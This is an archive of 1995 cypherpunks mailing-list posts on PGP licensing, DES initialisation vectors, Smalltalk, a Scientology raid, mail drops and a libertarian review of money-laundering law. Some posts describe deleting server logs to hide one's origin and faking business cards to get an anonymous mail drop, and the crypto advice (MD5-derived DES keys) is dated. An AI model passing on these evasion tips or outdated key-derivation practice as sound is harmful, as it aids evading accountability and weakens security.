> 
> This is an experiment from inside a program environment. I am serious.
> 
> 
> 
> -- Tim May
> 

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Aug 95 05:32:27 PDT
To: cypherpunks@toad.com
Subject: CAT_tal
Message-ID: <199508151232.IAA25456@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-15-95. NYPaper. [fundie lab-work for quantum 
cryptomorrow.]


   "It's a Molecule. No, It's More Like a Wave. In theory, an
   amoeba can behave as a wave and interfere with itself. In
   a university laboratory, a subatomic search for
   Schrodinger's Cat."

      Scientists at the Massachusetts Institute of Technology
      recently completed an experiment that proves that an
      object at least as large as a molecule can be made to
      act like a light wave -- forcibly split into two
      component waves and separately manipulated, altered,
      recombined and analyzed. Dr. David E. Pritchard and his
      colleagues at M.I.T. remind skeptics that quantum theory
      permits any object to behave as either a particle or a
      wave, depending on how it is viewed. Dr. Pritchard's
      research and that of other teams around the world
      represent an explosion of scientific interest in
      interferometry, a centuries-old technique by which waves
      are split and made to interfere with themelves,
      revealing details of nature that are otherwise hidden.
      With a brilliant history of discovery behind it,
      interferometry seems poised for a new golden age.


   CAT_tal (about 15kb)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 15 Aug 95 06:19:29 PDT
To: futplex@pseudonym.com (Futplex)
Subject: Re: CoS Raid on "Copyright Terrorist"
Message-ID: <199508151319.JAA18056@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:28 AM 8/14/95 -0400, Futplex wrote:
>Some CoS news:
>
>This past Saturday (95/08/12) a prominent Church of Scientology litigator,
>Helena Kobrin, and some U.S. federal marshals raided the home of Arnaldo
>Lerma, seizing pretty much all his computer hardware, disks, etc.

So why is it that people insist on listing their home addresses with their
ISP's rather than a mail receiving service or something else.  It is very
hard to raid a mail drop and obtain anything useful.  While it is true that
if you blow up buildings, the Fibbies may be able to find you, quite simple
techniques can frustrate even quite dedicated private parties.

DCF

"We warned you mental defectives back in '65 that the socialized medicine
offered by Medicare and Medicaid would be expensive, lousy, and eventually
not there at all but you didn't believe us.  Good luck."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 15 Aug 95 09:29:48 PDT
To: cypherpunks@toad.com
Subject: Smalltalk Musings
Message-ID: <ac56121a01021004fc51@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I have a few musings on Smalltalk and its possible role in themes of
interest to many of us. First, a comment on the "mailer" I tried last
night:

At 2:24 PM 8/15/95, Mats Bergstrom wrote:
>> The manufacturer is apparently acting as the collection point, and any name
>> can be put into the From: field.
>
>Then, effectively, Quasar is a new(?) kind of remailer.
>There was no got.net in the headers I could see. The
>next question is how they log incoming agents.

I discovered that the "-- Tim May" added to the end was by them, not me.
Just coincidence that I usually add "--Tim May" or "-- Tim May" before my
automatic sig block.

This was an experimental mailer included--"for educational purposes"--in
the latest Developer's Release of SmalltalkAgents. It has a few specific
things hardwired into it, such as using qks.com as its SMTP server.

Not a very effective remailer, as nothing cryptographically strong is
included. However, it shows that more and more languages and environments
are "speaking TCP/IP" and that integration of this stuff into high level
language environments is here. Java and HotJava do similar things, perhaps
even more powerfully. And obviously Unix/Linux tools are the standard here.

A few words on Smalltalk, an old language that is gaining in popularity.

(Smalltalk is doing pretty well for large projects. Several banks and
trading firms have aggressive Smalltalk programs, preferring it to C++ for
large, object-oriented projects. The company behind NetBank and NetCash,
SoftwareAgents, is using SmalltalkAgents. The leader in Smalltalk is of
course ParcPlace, which recently merged with Digitalk. Lots of info is
available on Smalltalk on the Web.)

The richness of Smalltalk lies in the extensive class libraries. Everything
is an object, no exceptions. (My personal interest--my asbestos suit is now
on--is in looking at economic exchanges and finding the classes and
methods, sort of "the ontology of money," and working on implementing
them.)

A few words of history. Most of you know that the current "graphical user
interface" (GUI) of the Macintosh and (more recently) Windows and X, etc.,
goes back to two main sources: the Xerox work by Aland Kay, Dan Ingalls,
and others on Smalltalk and the Xerox and MIT work on Lisp Machines. The
machines from Xerox Parc in the late 70s had the features we now think of
as central: bit-mapped screen, windows, menus, pop-up dialogs, mouse and
movable cursor, variable fonts, etc. (And the Xerox Parc folks were of
course influenced by the work of others, including Doug Engelbart at
Stanford Research Institute and the object-oriented language Simula.)

I'm not advocating that anyone use Smalltalk. Use what feels right, or what
your companies and groups expect. C++ is without doubt the most popular.
But diversity is good, so Python, Java, C+@, TCL, Lisp, Smalltalk, Perl,
Eiffel, Scheme, and even REXX all have roles to play, especially in specfic
situations. If Tim Berners-Lee and Marc Andreessen had dropped "hypertext"
when it was "dead and buried," where would we be today?

More info on SmalltalkAgents and their other products can be found at
http://www.qks.com/ . The Macintosh version is currently their only
supported platform, with a Windows NT (maybe Win '95, but doubtful) version
due later this year, and various Unix versions due after that.

They have some advances over ParcPlace's VisualWorks, but their longterm
success is not assured. Nor is my longterm success assured. :-}


-TCM





---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Tue, 15 Aug 95 06:52:43 PDT
To: cypherpunks@toad.com
Subject: Use of the IV in DES & stuffing the first block w/ random stuff
Message-ID: <JAA01935.199508151352@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


I have recently started writing a small pair of encription and
decription programs.  I was planning of gennerating the key by
taking the MD5 of the text password supplied by the user.

Seeing that I have 64 bits left over (MD5 gives me 128 bits, single
DES needs 56, tripple DES needs 168 - so I have a bit over 64 bits
left in both cases), is there anything useful that I could do with
them?

Does setting the IV (normally left at zero) buy me anything?

Does craming it into the first data block help protect me from
known plaintext attacks?  (I was going to use CBC so unless they
know the first block they can't use a known plaintext attack,
right?)

Or am I better off putting the extra 64 bits of "key" into the IV,
and gennerating a strong random number to stuff in the first block
- since the decoder can just ignore that block anyway.

(or should I ignore the IV, and stuffing random crud in the first
block?)

I don't recall Applyed Crypto. addressing these issues, but if I
just managed to forget can someone remind me what chapter I need
to re-read?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Tue, 15 Aug 95 06:59:50 PDT
To: cypherpunks@toad.com
Subject: The Spotlight
In-Reply-To: <Pine.SOL.3.91.950814213252.29712A-100000@use.usit.net>
Message-ID: <Pine.3.89.9508150904.R26620-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry, just a brief correction to the original file

> From: Duncan Frissell <frissell@panix.com>
> To: cypherpunks@toad.com
> Subject: Phone Card Risks
> 
> One of the plethora of TV Magazine shows featured Tim McViegh and phone
> cards last week.  Maybe I should post to Risks.
> 
> According to the story, Tim McViegh bought a bunch of phone cards from "The
> Spotlight" (famous Klan paper)

	The Spotlight is more of a rogue faction CIA/FBI 
Constitutionalist paper than a Klan paper, by my reckoning. Sources 
available on request.	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 15 Aug 95 10:48:06 PDT
To: kutek@ios.com (No Name)
Subject: Re: VIACRYPT
Message-ID: <199508151744.KAA08566@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 8/15/95 -0400, No Name wrote:
>Does anyone know if PKZ get's any royalties from the sale of Viacrypt-
>it is after all his code, isn't it?.  Or is the Viacrypt source entirely
>different ?
>Speaking of which code, has Viacrypt been "verified" in any way by
>some independent agency?

The RSA code in ViaCrypt 2.4 is different from the PGP code; most of the
rest is the same.  The documentation includes a note from Phil,
and I think the code is signed by him.  You can trust it.  As far as money goes,
I don't know their financial arrangements.  My copy has a pretty low serial
number; I hope they've sold enough to make some bucks.

The Windows version of 2.7.1 is substantially different - it's got a GUI
interface,
with a shell-like piece underneath that looks more like vanilla PGP. 
The Preface says it's using ViaCrypt's DigiSig+ RSA implementation,
the IDEA implementation is licensed from Ascom-Tech AG,
the compression code is from Info-Zip bt Mark Adler and Jean-loup Gailly,
and they've licensed Phil Zimmermann's PGP(tm) for the remainder.
They also acknowledge that lots of people contributed,
including Branko Lankester and Peter Gutmann.
The code is signed by ViaCrypt, and their key is signed by Phil.
The documentation is substantially rewritten, mostly for the GUI part.
The examples are somewhat amusing (removing a signature from a key
for Bill Haydon <bill@5thfloor.circus.com> ....)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 15 Aug 95 10:47:52 PDT
To: Kev <KEVIN@sia-corp.demon.co.uk>
Subject: Re: My pseudo-anonymous dream list (fwd)
Message-ID: <199508151744.KAA08592@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:26 PM 8/15/95 GMT0BST, Kev wrote:
>> I've heard this criticism of PGP before, but I don't quite understand it.
>> PGP is free.   Why not just upgrade to version 2.6?
>
>Easy to say not so easy to do if your outside the USA/Canada. 

Quite easily done.  ftp.ox.ac.uk has a good collection of PGP versions.
(Oh, no!  Somehow these crafty foreigners managed to smuggle munitions out of
the country right under the nose of our intelligence services! :-)
PGP 2.6.i was written to be a 2.6-compatible version for non-US use,
or you can use the 2.6.2 source code with RSAEuro instead of RSAREF
and not violate your government's copyright rules.

The reason PGP 2.6 is incompatible with 2.4 and earlier versions is
that it let MIT make PKP happier about letting them use RSAREF,
which gave them patent-legitimacy in the US.  (Incompatibilities
between earlier versions could be blamed on gratuituous attempts
at standards-compatibility...)

>However my point may be underlined by a little example :-
[Example deleted.]  Also, the code has been set up so that new versions
can read files written by old versions, and can write files in
old-format when needed; I assume the developers will continue this
approach any time they make incompatible changes.

But the big differences in 3.0 will be libraryizing the code -
one effect is that people will be able to build their own PGP-based tools
more easily than before, but aren't forced to include the whole package,
so people may end up building incompatible parts using the libraries.
Some of this is unavoidable - e.g. an encrypted telnet won't talk to a
batch file encryptor, but they should still be using the same signature code
for session-keys (or DH-halfkeys).

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kutek@ios.com (No Name)
Date: Tue, 15 Aug 95 09:43:34 PDT
To: cypherpunks@toad.com
Subject: VIACRYPT =money for Phil Z ???
Message-ID: <2NLMwQSYSH4F084yn@ios.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know if PKZ get's any royalties from the sale of Viacrypt-
it is after all his code, isn't it?.Or is the Viacrypt source entirely
different ?
Speaking of which code, has Viacrypt been "verified" in any way by
some independent agency?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 15 Aug 95 08:02:12 PDT
To: hallam@w3.org
Subject: Re: An article for Wired magazine
In-Reply-To: <9508150158.AA12834@zorch.w3.org>
Message-ID: <199508151501.LAA12164@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


P Hallam wrote:

| The major problem with DigiCash is the patent portfollio. I don't
| much like the idea of David Chaum replacing the government as the
| controller of the money supply. Sorry, I just don't.

	Remember that the patents only last 17 years.  (A few more,
since some of the major ones are staggered, but not a long time.
Governments tend to last longer than that.)



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 15 Aug 95 11:15:22 PDT
To: cypherpunks@toad.com
Subject: Re: VIACRYPT =money for Phil Z ???
In-Reply-To: <2NLMwQSYSH4F084yn@ios.com>
Message-ID: <WKOMwkkAseqE084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 15 Aug 1995 10:47:18 -0400, kutek@ios.com (No Name) wrote:

> Does anyone know if PKZ get's any royalties from the sale of Viacrypt-
> it is after all his code, isn't it?.Or is the Viacrypt source entirely
> different ?

He gets a small royalty.  I glanced at the August '95 "Internet World"
article without buying the mag :-) and in it prz says his ViaCrypt
royalty doesn't even pay his phone bill.  (Dunno how much his phone
bill is, tho.)


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Aug 95 09:29:24 PDT
To: cypherpunks@toad.com
Subject: PCryptoids
Message-ID: <199508151629.MAA16751@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   A couple of cryptoids from PC Mag, 9-12-95:


   [Review excerpts] *Network Security, Private Communication 
in
   a Public World*, review by O. Ryan Tabibian

   The book is grouped into three parts: "Cryptography,'
   "Authentication," and "Electronic Mail." There is also a
   "Leftover" section, which covers security with popular
   network operating systems such as Microsoft Windows NT and
   NetWare.

   Most books fail to cover the difficult subject of
   cryptography effectively. *Network Security*, however,
   clearly describes the different cryptography methods --
   such as secret key, hashing, and public-key cryptography --
   as well as a variety of other technologies, including
   Diffie-Hellman and RSA.

   The second section, "Authentication," deals with how a
   system or persons you are communicating with can verify
   your identity. Verification schemes range from simple
   passwords to complex digital signatures. The authors do a
   remarkable job of describing and analyzing the variety of
   authentication methods.

   Since the majority of your access to the outside world is
   through e-mail, your messages are probably most vulnerable.
   The book covers some of the popular e-mail security
   schemes, such as public key and privacyenhanced mail. A
   brief overview of X.400 is also included.

   Overall this is perhaps the most comprehensive, yet
   easiest-to-understand book covering network security
   available.

   Network Security, Private Communication in a Public World,
   by Charlie Kaufman, Radia Perlman, and Mike Speciner,
   $46.00. Prentice Hall PTR, 800-947- 7700; ISBN:
   0-13-061466-1.

-----------

   [Then, Bill Machrone muses on the utility of an electronic
   business cards. Excerpts:]

   Some of my correspondents want a magnetic stripe on the
   business card, pretty much like the one on your credit
   cards. Others want a bar code. Assuming that you don't use
   the back of your card for an alternative language, you've
   got several square inches back there, plenty of room for
   data.
             
   What will we use it for? The database stuff is the easy and
   obvious part. Since the computer industry and IS
   departments are likely to be the earliest adopters, it
   would be a simple matter to standardize on a format that
   the reader spits out for easy importation into just about
   anything. If the software and I/O devices are cheap enough,
   the rest of the world will come along -- and benefit.

   Authentication is a potentially huge application. In some
   South American countries, fraudulent representation is
   common. Crooks collect business cards from legitimate
   businesspeople and then misrepresent themselves to
   perpetrate a variety of scams. As a result, businesspeople
   commonly tear a corner of their card as they hand it to
   you. You don't trust a card that wasn't torn in front of
   you.

   A more elegant solution lies in a new Kodak technology that
   can encode your likeness in as little as 500 bytes,
   readable by your PDA, notebook, or desktop machines. You
   could also include a machine-readable version of your
   public encryption key, making it easy for people to send
   you secure communications.

----------











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 15 Aug 95 11:18:29 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: CoS Raid on "Copyright Terrorist"
In-Reply-To: <199508151319.JAA18056@panix.com>
Message-ID: <9508151817.AA03464@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
 > Nowadays, a $10-20/mo maildrop at places like "Mailboxes, Etc" works fine.

Mailboxes Etc. insists on getting a picture ID; at least they did last
time I checked.  Some smaller mom&pop places will take a business card
(time to break out your Jim Rockford Business Card Fabrication Kit).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 15 Aug 95 13:44:22 PDT
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: Use of the IV in DES & stuffing the first block w/ random stuff
Message-ID: <199508152039.NAA15590@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:52 AM 8/15/95 -0400, you wrote:
>I have recently started writing a small pair of encription and
>decription programs.  I was planning of gennerating the key by
>taking the MD5 of the text password supplied by the user.

A reasonable approach, but be careful in your implementation.
I haven't seen the book "A Million Wimpy Passwords and their MD5s" yet,
but the CD-ROM version may be out soon :-)  And you can probably
ftp it from dockmaster.

>Seeing that I have 64 bits left over (MD5 gives me 128 bits, single
>DES needs 56, tripple DES needs 168 - so I have a bit over 64 bits
>left in both cases), is there anything useful that I could do with them?
>
>Does setting the IV (normally left at zero) buy me anything?

IVs are designed to let you put random stuff in them to discourage
known-plaintext attacks, replay attacks, etc.   However, suppose you
take a known 64 bits from MD5(password) and put them in the IV -
instead of the Bad Guy needing to brute-force 168-bit-deep Triple DES,
he gets to brute force MD5s of human-selected passwords instead,
which makes a lot of pre-computation possible.

Also, for 3-Key Triple-DES, how do you get 168 bits of key from
128bits of MD5?  (for 2-Key 3-DES, you only need 112 bits...)
If you do something like M1=MD5(Key), M2=MD5(M1,Key), realize 
you've got at most 128 bits of real key instead of 168, 
though that probably needn't worry you too much...

>Does cramming it into the first data block help protect me from
>known plaintext attacks?  (I was going to use CBC so unless they
>know the first block they can't use a known plaintext attack, right?)  
Won't hurt, as long as you remember to remove it on the decrypt-end.

>Or am I better off putting the extra 64 bits of "key" into the IV,
>and generating a strong random number to stuff in the first block
>- since the decoder can just ignore that block anyway.
Put the strong random number in the IV, if you've _got_ a source
of strong random numbers...

You might want to do something fancy like choose a random salt,
use the salt for the IV, and use MD5(salt,human-selected-key) for the key.
This makes pre-computation much less useful (unless you're careless
and use MD5(key,salt) instead if MD5(salt,key)...), and means that
you use a different session key for each batch of stuff you encrypt,
even though you're using the same key.  If you're paranoid about replay
attacks, you could let some of the bits of the salt be random and some 
be a counter, and never accept a key smaller than the one from the
previous successfully-decrypted message.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 15 Aug 95 11:01:36 PDT
To: frissell@panix.com (Duncan Frissell)
Subject: Re: CoS Raid on "Copyright Terrorist"
In-Reply-To: <199508151319.JAA18056@panix.com>
Message-ID: <199508151800.OAA07537@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 09:28 AM 8/14/95 -0400, Futplex wrote:
> >Some CoS news:
> >
> >This past Saturday (95/08/12) a prominent Church of Scientology litigator,
> >Helena Kobrin, and some U.S. federal marshals raided the home of Arnaldo
> >Lerma, seizing pretty much all his computer hardware, disks, etc.
> 
> So why is it that people insist on listing their home addresses with their
> ISP's rather than a mail receiving service or something else.  It is very
> hard to raid a mail drop and obtain anything useful.  While it is true that
> if you blow up buildings, the Fibbies may be able to find you, quite simple
> techniques can frustrate even quite dedicated private parties.

  One of the reasons I used to receive all my mail at the "FSF" machines
(GNU.AI.MIT.EDU) was because I had a completely anonymous account. I had
the GNU account long before the FSF started registering people's 
name/phones, and I used to telnet into GNU from several completely
open annexes in Maryland. (the colleges would allow you to simply
telnet from the terminal server to anywhere with no restrictions.
This was back in 88-89 when the internet wasn't as big. Of course,
they shut it off later when outside users started busying up
the lines) And since I had root on the system, I could delete the
logs recording which IP addresses I was coming from.

Nowadays, a $10-20/mo maildrop at places like "Mailboxes, Etc" works fine.
(although there's still the possibility of them nabbing you when you go
to pick up the mail)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Tue, 15 Aug 95 07:45:41 PDT
To: cypherpunks@toad.com
Subject: Free Life article
Message-ID: <8975.9508151445@gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain





The article below, about money laundering, is taken from 
the latest issue of Free Life, the journal that I edit.  
If you like it and want to read more, send a $5 
dollar bill to the Editorial address at the bottom 
of this text.  If you want to read lots more, send me 
$20 for a four issue subscription.

Comments always welcome!


Sean Gabb
Editor
Free Life
London
25th July 1995

                  A R T I C L E   B E G I N S
=====================================================================
International Efforts to Combat Money Laundering

William C. Gilmore (ed.)

Grotius Publications Limited, Cambridge, 1992, 335pp, 48 (pbk)

(ISBN 0 521 46305 X)

Money Laundering:  A Practical Guide to the New Legislation

Rowan Bosworth-Davies and Graham Saltmarsh

Chapman & Hall, London, 1994, xii and 304pp, 49.50 (hbk)

(ISBN 0 412 57530 2)


The first of these books is a collection of treaties, plus other
documents, concerned with the international fight against money
laundering.  The second explains how these treaties have been enacted
into, and are enforced under, the laws of the United Kingdom.  Both
works will repay the closest study.  In clear detail, they show the
growth of what must be called a New World Order, and how, without
some interposing cause, this may produce a universal slide into
despotism.

The fight against money laundering begins with realising that the
"War on Drugs" has been lost.  When goods are portable and easily
concealed, and when demand for them is strong enough to bear almost
any cost of bringing them to market, the main effect of prohibition will
be to put a bounty on crime.  For all the efforts of the past three
generations, illegal drugs are available in most high security prisons. 
In much of the West, street prices have been stable or even falling
since 1980.

The official response, however, has not been to give in and legalise the
trade, but to expand the War to a front where previously there had
been few hostilities.  While keeping up their efforts against the trade
itself, the authorities have turned increasingly to confiscating its
proceeds.  This new approach has three alleged benefits:

First, it will deprive criminals of their incentive to enter and remain
in the trade;

Second, it will allow the punishing of those in charge of the trade -
people who never touch or see illegal drugs, but to whom the main
profits ultimately flow;

Third, it can make the War on Drugs self-supporting, and perhaps
yield a surplus for other public spending.

There is, however, one practical difficulty.  Before the authorities can
confiscate the money, they must find it.  To do this, they must keep it
from being merged beyond recall into the general flow of investment. 
This involves ending bank secrecy and imposing a mass of financial
regulation.  Now, most people - especially the rich - dislike having
their lives pried into.  Nor do banks like higher costs and limitations
on what business they can do.  And so, given the present freedom of
capital markets, no government acting alone can afford a strict policy
of confiscation.  It would, sooner or later, cause a flight of transactions
to more liberal places.

The solution has been to try making everywhere in the world equally
illiberal.  Such  was the purpose of the United Nations Convention
Against Illicit Traffic in Narcotic Drugs and Narcotic Substances,
signed in Vienna in December 1988 [full text in Gilmore, pp.75-97]. 
This is one of the most important international treaties of the past 50
years.  It not merely requires its signatory states to criminalise the
laundering of drug money, and to confiscate it where found, but lays
down so far as possible a common wording for the criminal statutes,
and a common mode of enforcement.  It also requires full and prompt
cooperation between the signatory states for the enforcement of these
laws anywhere in the world.

The Convention had little direct or immediate effect on British law. 
Many of its requirements, indeed, had already been met in the Drug
Trafficking Offences Act 1986.  Most others were only met in the
Criminal Justice Act 1993, which enacts the European Community
Directive of 1991 on the Prevention of the Use of the Financial System
for the Purpose of Money Laundering [full text in Gilmore, pp.250-67]. 
This itself derives from the Vienna Convention only through the
Council of Europe Convention on Laundering, Search, Seizure and
Confiscation of the Proceeds from Crime 1990 [full text in Gilmore,
pp.177-91].  Even so, this country is fast becoming a financial police
state of the kind agreed at Vienna - and where the process cannot be
traced to the Convention, it can be traced to the same international
pressures of which the Convention is itself a result.

Let me explain.  When I talk about a New World Order, I do not mean
some grand conspiracy of bankers, or Jews, or Illuminati, or even -
with far more probability - the American Government.  There are
countries where policy is largely dictated from outside.  But for rich
and powerful countries, the truth is more complex.  Most international
obligations imposed on this country, for example, were not only
consented to by our rulers, but were usually proposed by them, and
are enforced by agencies in which our own countrymen often occupy
senior positions.

Where others see conspiracies, I see public choice economics. 
Whenever a government tries to do something dangerous or
unnecessary, like banning drugs or educating the poor, it must set up
an agency through which to spend the allocated funds.  Once
employed, the agents will - as if directed by an invisible hand - start
to find more and more justifications for expanding their status and
numbers.  They collect the statistics.  They know which ones to
publish and which to hold back.  They are the politicians' first and
favoured source of advice.  They have their pet journalists.  They trade
favours with the relevant interest groups.  They know exactly how to
give themselves a pleasing life, and how to see off threats to it. 
Unless the money runs out, or the public turns really nasty, they can
write their own budget cheques.

By natural extension, the same is now happening at the international
level - though with potentially far worse consequences.  In the first
place, there is limitless money:  budgets would need to swell
unimaginably large to reach even one per cent of gross planetary
product.  In the second, public anger seldom crosses borders; and, if all
else fails, the politicians and bureaucrats in one country can shelter
behind the excuse of treaty obligations that cannot be unilaterally be
cast off - not, at least, without consequences more horrible than words
exist to describe.  Third, the enforcement of international treaties
means the growth of what is in effect an international bureaucracy. 
The local enforcers of a treaty may be citizens of the signatory states,
who will live and work in their home countries, and may even occupy
positions in the domestic administration.  Yet these are people who,
by virtue of the agreements they enforce, and the contacts they make
and maintain in other countries, are members of an international
order.  And, in at least the case of money laundering, they will share
an agenda that is often deeply hostile to their native institutions.

This can be seen - expressed with almost naive honesty - in the book
by Messrs Bosworth-Davies and Saltmarsh.  Both are British police
officers:  the latter is a departmental head at the National Criminal
Intelligence Service.  Both take it for granted that the world needs an
international police force.  Both are unable to believe that anyone can
disinterestedly object to the necessary harmonisations of law, and the
corresponding abolition of Common Law protections.  They "know one
senior clearing banker who has described this [money laundering]
legislation as the nearest thing he has experienced to
'McCarthyism'...".[p.172]  Of course, they see things differently.  The
legislation

     discloses, on mature reflection, a set of carefully structured
     laws which, with good will, due diligence and a modicum of
     responsible attention from the industry as a whole, should
     not prove too burdensome.  Indeed, the authors believe that
     some of the regulatory requirements have been diluted too
     much already, in a misguided attempt to placate the
     sensibilities of certain sectors of the industry....[Ibid.]

With people like this advising the politicians and lecturing the rest of
us, little wonder the Drug Trafficking Offences Act predates the
Vienna Convention by two years!  Though they will hotly disagree -
and even perhaps consider a libel writ - Messrs Bosworth-Davies and
Saltmarsh cannot be regarded as our countrymen.  More at home in
a gathering of Bulgarian or Filipino police chiefs than with any of us,
they are foreigners with British passports.

Somewhat less honest, though still interesting, is the Explanatory
Report of the Committee of Experts who drafted the Council of Europe
Convention [full text in Gilmore, pp.192-237].  Though formally
subordinate to a committee of the various European Ministers of
Justice, these experts plainly saw their first duty as lying elsewhere. 
Call it "the international community" or their own order, their duty
was collective and not to any single country.

Look at their dislike of the narrow focus of the Vienna Convention. 
They wanted something that would also allow confiscation for

     terrorist offences, organised crime, violent crimes, offences
     involving the sexual exploitation of children and young
     persons, extortion, kidnapping, environmental offences,
     economic fraud, insider trading and other serious offences.
     [Gilmore, p.204]

But they had to concede that not every European country might like
its own laws against these acts to be written by an international
committee.  And so they allowed each signatory state to reserve
whatever of these acts to its own legislative process.

     The experts agreed, however, that such states should
     review their legislation periodically and expand the
     applicability of confiscation measures, in order to be able
     to restrict the reservations subsequently as much as
     possible. [Ibid.]

And this is only the beginning.  As yet, the shape of world government
exists barely in outline.  But the tendency ought to be plain.  Power
is moving from national - and mostly democratic - governments to
unaccountable and even invisible bureaucracies.  Liberal institutions
that are often the work of ages are being hammered into the
transmitters of unlimited power.  We are beginning to known how
people in the Greek city states felt after absorption into the Roman
Empire.

When the American militiamen cry out that the United Nations is
about to invade in black helicopters and plant microcomputers in their
bottoms, I am at least sceptical.  This is not the New World Order that
I see.  What I do see is actually worse.  We can shoot the helicopters
down, and dig out the microcomputers, and put the ringleaders on
trial.  We can go about playing the hero of our choice from Star Wars. 
But in the real world, there is no Death Star to blow up - no Darth
Vadar to push into the void.  There is just a huge, elastic network of
people, all acting in what they believe is the public good, most with
some degree of public support.

How this kind of despotism can be resisted is another question, and I
have said enough already.  But I will repeat - the books here reviewed
do repay a very close study.  At the very least, it is useful to see the
enemy's future plan laid out in such detail.

Sean Gabb
======================================================================
    $$$$$$  $$$$$   $$$$$$  $$$$$$     $$      $$   $$$$$$  $$$$$$
    $$      $$   $  $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$$$    $$$     $$$$    $$$$       $$      $$   $$$$    $$$$
    $$      $$ $    $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$      $$   $  $$$$$$  $$$$$$     $$$$$$  $$   $$      $$$$$$
 
        A Journal of Classical Liberal and Libertarian Thought

    Production:                                   Editorial:
    c/o the Libertarian Alliance                  123a Victoria Way
    25 Chapter Chambers                           Charlton
    London SW1P 4NN                               London SE7 7NX

